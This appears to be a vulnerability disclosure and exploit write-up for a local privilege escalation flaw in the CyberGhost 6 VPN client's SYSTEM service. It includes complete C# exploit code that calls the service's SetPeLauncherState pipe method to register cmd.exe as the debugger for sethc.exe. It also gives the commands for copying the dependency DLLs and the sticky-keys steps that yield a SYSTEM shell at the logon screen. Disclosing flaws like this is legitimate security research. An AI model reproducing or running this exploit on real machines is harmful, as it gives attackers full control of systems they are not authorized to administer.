CyberGhost Privilege Escalation



CG6Service runs as SYSTEM process.

wmic service where name="CG6Service" get StartName

Every process can communicate with this service using pipe.

This service has interesting method SetPeLauncherState which allows launch the debugger automatically for every process we want using HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\Image File Execution Options - see MSDN

We can use this method for privilege escalation setting cmd.exe as a debugger to the sethc.exe process - its well known technique called sticky keys.

using System;
using CyberGhost.Communication;

namespace cyber
    class Program
        static void Main(string[] args)
            Console.WriteLine("CyberGhost Privilege Escalation");
            Console.WriteLine("by Kacper Szurek");
            PeLauncherOptions options = new PeLauncherOptions();
            options.ExecuteableName = "sethc.exe";
            options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
            EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
            CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
            Console.WriteLine("Now logout and then press SHIFT key 5 times");

Proof of Concept:

Download Exploit

We need some dependency files before lunching exploit:

copy "c:\Program Files\CyberGhost 6\CyberGhost.Communication.dll" .
copy "c:\Program Files\CyberGhost 6\CyberGhost.VPNServices.dll" .
copy "c:\Program Files\CyberGhost 6\MobileConcepts45.dll" .

After successfully exploit execution we need to log out and press Shift key 5 times on the logon screen.

Then cmd.exe is executed as SYSTEM.